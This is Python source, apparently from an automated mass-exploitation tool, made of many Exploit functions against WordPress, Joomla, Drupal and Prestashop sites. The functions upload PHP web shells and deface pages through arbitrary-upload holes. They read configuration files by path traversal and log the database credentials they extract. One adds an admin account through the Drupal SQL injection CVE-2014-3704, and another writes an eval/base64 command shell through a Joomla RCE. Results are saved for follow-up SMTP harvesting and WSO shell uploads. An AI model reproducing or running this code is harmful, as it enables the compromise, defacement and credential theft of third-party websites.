def Exploit(site):
try:
ShellFile = {'popimg': open(pagelinesExploitShell, 'rb')}
Exp = 'http://' + site + '/wp-admin/admin-ajax.php?action=getcountryuser&cs=2'
requests.post(Exp, files=ShellFile, timeout=10, headers=Headers)
CheckShell = 'http://' + site + '/wp-content/uploads/20' + year + '/' + month + '/' \
+ pagelinesExploitShell.split('/')[1]
GoT = requests.get(CheckShell, timeout=10, headers=Headers)
if GoT.status_code == 200:
CheckShell = requests.get('http://' + site +
'/wp-content/vuln.php',
timeout=10,
headers=Headers)
CheckIndex = requests.get('http://' + site + '/vuln.htm',
timeout=10,
headers=Headers)
if 'Vuln!!' in CheckShell.content:
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.content:
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
return printModule.returnYes(site, 'N/A', 'addblockblocker',
'Wordpress')
else:
return printModule.returnNo(site, 'N/A', 'addblockblocker',
'Wordpress')
else:
return printModule.returnNo(site, 'N/A', 'addblockblocker',
'Wordpress')
except:
return printModule.returnNo(site, 'N/A', 'addblockblocker',
'Wordpress')
def Exploit(site):
try:
requests.post(
'http://' + site +
'/index.php?option=com_b2jcontact&view=loader&type=uploader&'
'owner=component&bid=1&qqfile=/../../../vuln.php',
data=payloadshell,
timeout=10,
headers=Headers)
CheckSh = requests.get('http://' + site +
'/components/com_b2jcontact/vuln.php',
timeout=10,
headers=Headers)
if 'Vuln!!' in str(CheckSh.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/components/com_b2jcontact/vuln.php?cmd=uname -a' +
'\n')
getSMTP.JooomlaSMTPshell(
site + '/components/com_b2jcontact/vuln.php?cmd=id')
return printModule.returnYes(site, 'N/A', 'Com_b2jcontact',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_b2jcontact',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla')
def exploit(url):
try:
target_url = url + '/index.php/component/users'
make_req(target_url, get_backdoor_pay())
if ping_backdoor(url, backdoor_param):
execute_backdoor(
url, 'system(\'echo "Vuln!!" > vuln.htm\');') # cmd=commend
execute_backdoor(
url,
'system(\'echo "Vuln!!<?php {}(base64_decode("{}")); ?>" > vuln.php\');'
.format('eval', 'c3lzdGVtKCRfR0VUWyJjbWQiXSk7'))
CheckShell = requests.get('http://' + url + '/vuln.php',
headers=Headers,
timeout=10)
checkIndex = requests.get('http://' + url + '/vuln.htm',
headers=Headers,
timeout=10)
if 'Vuln!!' in str(CheckShell.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(url + '/vuln.php?cmd=id' + '\n')
getSMTP.JooomlaSMTPshell(url + '/vuln.php?cmd=id')
if 'Vuln!!' in str(checkIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(url + '/vuln.htm\n')
return printModule.returnYes(url, 'CVE-2015-8562',
'Joomla 3.x Rce', 'Joomla')
else:
return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce',
'Joomla')
except:
return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce',
'Joomla')
def Exploit(site):
try:
Exp = site + '/modules/attributewizardpro_x/file_upload.php'
FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers)
if Jce_Deface_image.split('/')[1] in GoT.content:
Index = GoT.content.split('|||')[0]
IndexPath = site + '/modules/attributewizardpro_x/file_uploads/' + Index
CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers)
if 'GIF89a' in CheckIndex.content:
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5, headers=Headers)
if ShellPresta.split('/')[1] in GoT.content:
Shell = Got2.content.split('|||')[0]
ShellPath = site + '/modules/attributewizardpro_x/file_uploads/' + Shell
CheckShell = requests.get('http://' + ShellPath, timeout=5, headers=Headers)
if 'Vuln!!' in CheckShell.content:
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
return printModule.returnYes(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop')
else:
return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop')
else:
return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop')
except:
return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop')
def Exploit(site):
user = '******'
password = '******'
Hash = '$S$CTo9G7Lx2FC8odOl10OKshDIRREshaeCN8.zqA9I3PT0X4cqLUJ3mBEdyl6juLsRE3EBTKNzhGXKiz5rMulPcvmBhxbLNn1'[:55]
POSTDATA = {
'name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,'
'+MAX(uid)%2B1,+%27{}%27,+%27{}%27+FROM+users;insert+into+users_'
'roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+'
'%27{}%27),+3);;#%20%20]'.format(user, Hash, user): 'test3&name[0]',
'name[0]': 'test',
'pass': '******',
'test2': 'test',
'form_build_id': '',
'form_id': 'user_login_block',
'op': 'Log+in'
}
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
try:
resp = requests.post('http://' + site + '/?q=node&destination=node', timeout=10, data=POSTDATA, headers=agent)
if "mb_strlen() expects parameter 1" in str(resp.content):
with open('result/AdminTakeover_results.txt', 'a') as writer:
writer.write(site + '/user/login\n Username: {}\n'
' Password: {}\n------------------------------------------\n'
.format(user, password))
return printModule.returnYes(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal')
else:
return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal')
except:
return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal')
def Exploit(site):
try:
Checkvuln = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/img/unlock.gif',
timeout=10, headers=Headers)
if 'GIF89a' in str(Checkvuln.content):
PostDAta = {'dm_upload': ''}
fileDeface = {'upfile': open(Jce_Deface_image, 'rb')}
fileShell = {'upfile': open(pagelinesExploitShell, 'rb')}
requests.post('http://' + site, data=PostDAta, files=fileDeface, timeout=10, headers=Headers)
CheckIndex = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
Jce_Deface_image.split('/')[1])
if 'GIF89a' in str(CheckIndex.content):
requests.post('http://' + site, data=PostDAta, files=fileShell, timeout=10, headers=Headers)
requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
pagelinesExploitShell.split('/')[1], timeout=10, headers=Headers)
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php',
timeout=10, headers=Headers)
if 'Vuln!!' in str(CheckShell.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
pagelinesExploitShell.split('/')[1] + '\n')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
return printModule.returnYes(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
else:
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
Jce_Deface_image.split('/')[1] + '\n')
return printModule.returnYes(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
except:
return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
def Exploit(site):
Exl = site + '/modules/fieldvmegamenu/ajax/upload.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers)
if Checkvuln.status_code == 200:
FileDataIndex = {'images[]': open(Jce_Deface_image, 'rb')}
FileDataShell = {'images[]': open(ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/fieldvmegamenu/uploads/' + Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/fieldvmegamenu/uploads/' + ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5, headers=Headers)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers)
if 'GIF89a' in CheckIndex.content:
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5, headers=Headers)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers)
if 'Vuln!!' in Checkshell.content:
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
return printModule.returnYes(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop')
else:
return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop')
else:
return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop')
except:
return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop')
def Exploit(site):
try:
Check = requests.get('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
timeout=10, headers=Headers)
if Check.status_code == 200 or Check.status_code == 500:
IndeX = {'files[]': open(Jce_Deface_image, 'rb')}
ShellFile = {'files[]': open(ShellPresta, 'rb')}
Datapost = {'jpath': '../../../../'}
requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
files=ShellFile, data=Datapost, timeout=10, headers=Headers)
CheckShell = requests.get('http://' + site +
'/images/stories/up.php', timeout=10, headers=Headers)
if 'Vuln!!' in str(CheckShell.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/stories/up.php\n')
return printModule.returnYes(site, 'N/A', 'Com_rokdownloads', 'Joomla')
else:
requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
files=IndeX, data=Datapost, timeout=10, headers=Headers)
CheckIndex = requests.get('http://' + site + '/images/stories/' + Jce_Deface_image.split('/')[1],
headers=Headers, timeout=10)
if 'GIF89a' in str(CheckIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/images/stories/' + Jce_Deface_image.split('/')[1] + '\n')
return printModule.returnYes(site, 'N/A', 'Com_rokdownloads', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla')
def Exploit(site):
try:
PostFile = {'file': open('files/up.php', 'rb')}
requests.post('http://' + site +
'/modules/mod_simplefileuploadv1.3/elements/udd.php',
files=PostFile,
timeout=10,
headers=Headers)
CheckShell = requests.get(
'http://' + site +
'/modules/mod_simplefileuploadv1.3/elements/up.php',
timeout=10,
headers=Headers)
if 'Vuln!!' in str(CheckShell.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site +
'/modules/mod_simplefileuploadv1.3/elements/up.php' + '\n')
return printModule.returnYes(site, 'N/A',
'mod_simplefileuploadv Module',
'Joomla')
else:
return printModule.returnNo(site, 'N/A',
'mod_simplefileuploadv Module',
'Joomla')
except:
return printModule.returnNo(site, 'N/A',
'mod_simplefileuploadv Module', 'Joomla')
def Exploit(site):
try:
Exp = 'http://' + site + \
'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
GetConfig = requests.get(Exp, timeout=10, headers=Headers)
if 'DB_PASSWORD' in str(GetConfig.content):
Attack(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
#define('DB_USER', 'admin_soljica2');
Gethost = re.findall("'DB_HOST', '(.*)'", str(GetConfig.content))
Getuser = re.findall("'DB_USER', '(.*)'", str(GetConfig.content))
Getpass = re.findall("'DB_PASSWORD', '(.*)'", str(GetConfig.content))
Getdb = re.findall("'DB_NAME', '(.*)'", str(GetConfig.content))
cpanel.Check(site, Getuser[0], Getpass[0])
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[0] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
except:
return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
except:
return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
def Exploit(site):
try:
Exp = 'http://' + site + \
'/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
GetConfig = requests.get(Exp, timeout=10, headers=Headers)
if 'JConfig' in str(GetConfig.content):
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
Getuser = re.findall("user = '******';", str(GetConfig.content))
Getpass = re.findall("password = '******';",
str(GetConfig.content))
Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] +
'\n---------------------\n')
getSMTP.GETSmtpJoomConf(str(GetConfig.content))
except:
return printModule.returnYes(site, 'N/A',
'Com_s5_media_player', 'Joomla')
return printModule.returnYes(site, 'N/A', 'Com_s5_media_player',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_s5_media_player',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_s5_media_player',
'Joomla')
def Exploit(site):
try:
requests.post('http://' + site + '/administrator/components/com_redmystic/chart/'
'ofc-library/ofc_upload_image.php?name=vuln.php',
data=payloadshell, headers=Headers, timeout=10)
Exp = requests.get('http://' + site + '/administrator/components/com_redmystic/'
'chart/tmp-upload-images/vuln.php',
headers=Headers, timeout=10)
if 'Vuln!!' in str(Exp.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/administrator/components/com_redmystic/chart/'
'tmp-upload-images/vuln.php?cmd=uname -a' + '\n')
getSMTP.JooomlaSMTPshell(site + '/administrator/components/com_redmystic/chart/'
'tmp-upload-images/vuln.php?cmd=id')
WSo = wsoShellUploaderModule.UploadWso(site + '/administrator/components/com_redmystic/chart/'
'tmp-upload-images/vuln.php?cmd=id')
if WSo == 'No':
pass
else:
with open('result/WSo_Shell.txt', 'a') as Wr:
Wr.write('{}\n'.format(WSo))
return printModule.returnYes(site, 'N/A', 'Com_redmystic', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla')
def Exploit(site):
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0'}
sess = requests.session()
try:
GET = sess.get('http://' + site + '/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name='
'jform_articletext&asset=com_content&author=&folder=',
timeout=10, headers=headers)
if 'task=file.upload' in str(GET.content):
try:
Uploader = re.findall('action="(.*)" id="uploadForm"', str(GET.content))[0]
if Uploader.startswith("http://"):
Uploader = Uploader.replace("http://", "")
elif Uploader.startswith("https://"):
Uploader = Uploader.replace("https://", "")
else:
pass
POSTDATA = {'Filedata[]': open(TextindeX, 'rb')}
sess.post('http://' + Uploader, files=POSTDATA, headers=headers, timeout=10)
CheckIndex = requests.get('http://' + site + '/images/vuln.txt', timeout=10,
headers=headers).content
if 'Vuln!!' in str(CheckIndex):
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.txt\n')
return printModule.returnYes(site, 'N/A', 'Com_Media', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
def Exploit(site):
try:
fileindex = {'fileToUpload': open(Jce_Deface_image, 'rb')}
Exp = 'http://' + site + '/index.php?option=com_myblog&task=ajaxupload'
GoT = requests.post(Exp, files=fileindex, timeout=10, headers=Headers)
if 'success' or 'File exists' in str(GoT.content):
if '/images/pwn' in str(GoT.content):
IndeXpath = 'http://' + site + '/images/pwn.gif'
else:
try:
GetPAth = re.findall("source: '(.*)'", str(GoT.content))
IndeXpath = GetPAth[0]
except:
IndeXpath = 'http://' + site + '/images/pwn.gif'
CheckIndex = requests.get(IndeXpath, timeout=10, headers=Headers)
if 'GIF89a' in str(CheckIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndeXpath + '\n')
return printModule.returnYes(site, 'N/A', 'Com_MyBlog',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_MyBlog',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_MyBlog', 'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_MyBlog', 'Joomla')
def Exploit(site):
try:
requests.post(
'http://' + site +
'/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/'
'php-ofc-library/ofc_upload_image.php?name=vuln.php',
data=payloadshell,
headers=Headers,
timeout=10)
Exp = requests.get(
'http://' + site +
'/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/'
'tmp-upload-images/vuln.php',
headers=Headers,
timeout=10)
if 'Vuln!!' in str(Exp.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site +
'/administrator/components/com_civicrm/civicrm/packages/'
'OpenFlashChart/tmp-upload-images/vuln.php?cmd=uname -a' +
'\n')
getSMTP.JooomlaSMTPshell(
site +
'/administrator/components/com_civicrm/civicrm/packages/'
'OpenFlashChart/tmp-upload-images/vuln.php?cmd=id')
return printModule.returnYes(site, 'N/A', 'Com_civicrm', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla')
def Com_Jdownloads(site):
try:
fileindex = {'file_upload': (ZipJd, open(ZipJd, 'rb'), 'multipart/form-data'),
'pic_upload': (Jce_Deface_image, open(Jce_Deface_image, 'rb'), 'multipart/form-data')}
post_data = {
'name': 'ur name',
'mail': '*****@*****.**',
'catlist': '1',
'filetitle': "lolz",
'description': "<p>zot</p>",
'2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
'send': 1,
'senden': "Send file",
'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
'option': "com_jdownloads",
'view': "upload"
}
Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
Got = requests.post(Exp, files=fileindex, data=post_data, timeout=10, headers=Headers)
if '/upload_ok.png' in str(Got.content):
checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + Jce_Deface_image.split('/')[1]
Check = requests.get(checkUrl, timeout=10, headers=Headers)
if 'GIF89a' in str(Check.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(checkUrl + '\n')
return printModule.returnYes(site, 'N/A', 'Com_Jdownloads', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla')
def Exploit(site):
try:
PostData = {'path': '../../../tmp/'}
fil = {'raw_data': ('vuln.php', payloadshell, 'text/html')}
requests.post(
'http://' + site +
'/components/com_oziogallery/imagin/scripts_ralcr/filesystem'
'/writeToFile.php',
files=fil,
data=PostData,
headers=Headers,
timeout=10)
CheckShell = requests.get('http://' + site + '/tmp/up.php',
headers=Headers,
timeout=10)
if 'Vuln!!' in str(CheckShell.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/tmp/vuln.php?cmd=uname -a' + '\n')
getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php?cmd=id')
return printModule.returnYes(site, 'N/A', 'Com_oziogallery',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_oziogallery',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla')
def Exploit(site):
IndeXText = 'Acik bulundu!'
ency = {
'action':
"revslider_ajax_action",
'client_action':
"update_captions_css",
'data':
"<body style='color: transparent;background-color: black'><center><h1>"
"<b style='color: white'>" + IndeXText +
"<p style='color: transparent'>",
}
try:
url = "http://" + site + \
"/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"
aa = requests.post(url, data=ency, timeout=10, headers=Headers)
if 'succesfully' in str(aa.content):
deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css'
X = requests.get('http://' + deface, timeout=10, headers=Headers)
if 'Vuln!!' in str(X.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(deface + '\n')
return printModule.returnYes(site, 'CVE-2015-5151',
'Revslider CSS Injection',
'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2015-5151',
'Revslider CSS Injection', 'Wordpress')
except:
return printModule.returnNo(site, 'CVE-2015-5151',
'Revslider CSS Injection', 'Wordpress')
def Exploit(site):
Exl = site + '/modules/wg24themeadministration/wg24_ajax.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers)
if Checkvuln.status_code == 200:
PostData = {'data': 'bajatax',
'type': 'pattern_upload'}
FileDataIndex = {'bajatax': open(Jce_Deface_image, 'rb')}
FileDataShell = {'bajatax': open(ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/wg24themeadministration/img/upload/' \
+ Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/wg24themeadministration/img/upload/' \
+ ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5, headers=Headers)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers)
if 'GIF89a' in CheckIndex.content:
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, data=PostData,
timeout=5, headers=Headers)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers)
if 'Vuln!!' in Checkshell.content:
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
return printModule.returnYes(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
else:
return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
else:
return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
except:
return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
def Exploit(site):
try:
Exp = site + '/modules/cartabandonmentproOld/upload.php'
Checkvuln = requests.get('http://' + Exp, timeout=5, headers=Headers)
FileDataIndex = {'image': open(Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp,
files=FileDataIndex,
timeout=5,
headers=Headers)
IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + Jce_Deface_image.split(
'/')[1]
CheckIndex = requests.get('http://' + IndexPath,
timeout=5,
headers=Headers)
if 'GIF89a' in str(CheckIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
return printModule.returnYes(site, 'N/A',
'CartabandonmentproOld Module',
'Prestashop')
else:
return printModule.returnNo(site, 'N/A',
'CartabandonmentproOld Module',
'Prestashop')
else:
return printModule.returnNo(site, 'N/A',
'CartabandonmentproOld Module',
'Prestashop')
except:
return printModule.returnNo(site, 'N/A',
'CartabandonmentproOld Module',
'Prestashop')
def Exploit(site):
try:
fileDeface = {'userfile': open(Jce_Deface_image, 'rb')}
Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php'
Check = requests.get(Exp, timeout=10, headers=Headers)
if 'class="inputbox" name="userfile"' in str(Check.content):
Post = requests.post(Exp,
files=fileDeface,
timeout=10,
headers=Headers)
if 'has been successfully' or 'already exists' in str(
Post.content):
CheckIndex = requests.get(
site + '/administrator/components/com_alberghi/' +
Jce_Deface_image.split('/')[1],
timeout=10,
headers=Headers)
if 'GIF89a' in str(CheckIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/administrator/components/com_alberghi/' +
Jce_Deface_image.split('/')[1] + '\n')
return printModule.returnYes(site, 'N/A', 'Com_alberghi',
'Joomla')
return printModule.returnYes(site, 'N/A', 'Com_alberghi',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_alberghi',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla')
def Exploit(site):
try:
Exp = 'http://' + site + \
'/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/' \
'downloadAttachment.php?path=../../../../../wp-config.php'
GetConfig = requests.get(Exp, timeout=5, headers=Headers)
if 'DB_PASSWORD' in GetConfig.content:
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.content)
Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.content)
Getpass = re.findall("'DB_PASSWORD', '(.*)'",
GetConfig.content)
Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.content)
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[0] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] +
'\n---------------------\n')
except:
return printModule.returnYes(site, 'N/A', 'wp-support-plus',
'Wordpress')
return printModule.returnYes(site, 'N/A', 'wp-support-plus',
'Wordpress')
else:
return printModule.returnNo(site, 'N/A', 'wp-support-plus',
'Wordpress')
except:
return printModule.returnNo(site, 'N/A', 'wp-support-plus',
'Wordpress')
def Exploit(site):
try:
Check = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
timeout=10, headers=Headers)
if Check.status_code == 200:
ShellFile = {'files[]': open(ShellPresta, 'rb')}
requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
files=ShellFile, headers=Headers, timeout=10)
CheckShell = requests.get('http://' + site +
'/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php',
timeout=10, headers=Headers)
if 'Vuln!!' in str(CheckShell.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php\n')
return printModule.returnYes(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
else:
ShellFile = {'files[]': open(Jce_Deface_image, 'rb')}
requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
files=ShellFile, headers=Headers, timeout=10)
CheckIndex = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/'
'php/files/' + Jce_Deface_image.split('/')[1],
timeout=10, headers=Headers)
if 'GIF89a' in str(CheckIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/'
+ Jce_Deface_image.split('/')[1] + '\n')
return printModule.returnYes(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
def Exploit(site):
try:
Exp = site + '/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php'
Checkvuln = requests.get('http://' + Exp, timeout=10, headers=Headers)
FileDataIndex = {'qqfile': open(Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp,
files=FileDataIndex,
timeout=10,
headers=Headers)
IndexPath = site + '/modules/advancedslider/uploads/' + Jce_Deface_image.split(
'/')[1]
CheckIndex = requests.get('http://' + IndexPath,
timeout=10,
headers=Headers)
if 'GIF89a' in str(CheckIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
return printModule.returnYes(site, 'N/A',
'advancedslider Module',
'Prestashop')
else:
return printModule.returnNo(site, 'N/A',
'advancedslider Module',
'Prestashop')
else:
return printModule.returnNo(site, 'N/A', 'advancedslider Module',
'Prestashop')
except:
return printModule.returnNo(site, 'N/A', 'advancedslider Module',
'Prestashop')
def Exploit(site):
try:
PostData = {'jpath': '..%2F..%2F..%2F..%2Ftmp%2F'}
fil = {'file': ('vuln.php.xxxjpg', payloadshell, 'text/html')}
requests.post(
'http://' + site +
'/administrator/components/com_simplephotogallery/lib/uploadFile.php',
data=PostData,
files=fil,
timeout=10,
headers=Headers)
Exp = requests.get('http://' + site + '/tmp/vuln.php.xxxjpg',
timeout=10,
headers=Headers)
if 'Vuln!!' in str(Exp.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/tmp/vuln.php.xxxjpg?cmd=uname -a' + '\n')
getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php.xxxjpg?cmd=id')
WSo = wsoShellUploaderModule.UploadWso(
site + '/tmp/vuln.php.xxxjpg?cmd=id')
if WSo == 'No':
pass
else:
with open('result/WSo_Shell.txt', 'a') as Wr:
Wr.write('{}\n'.format(WSo))
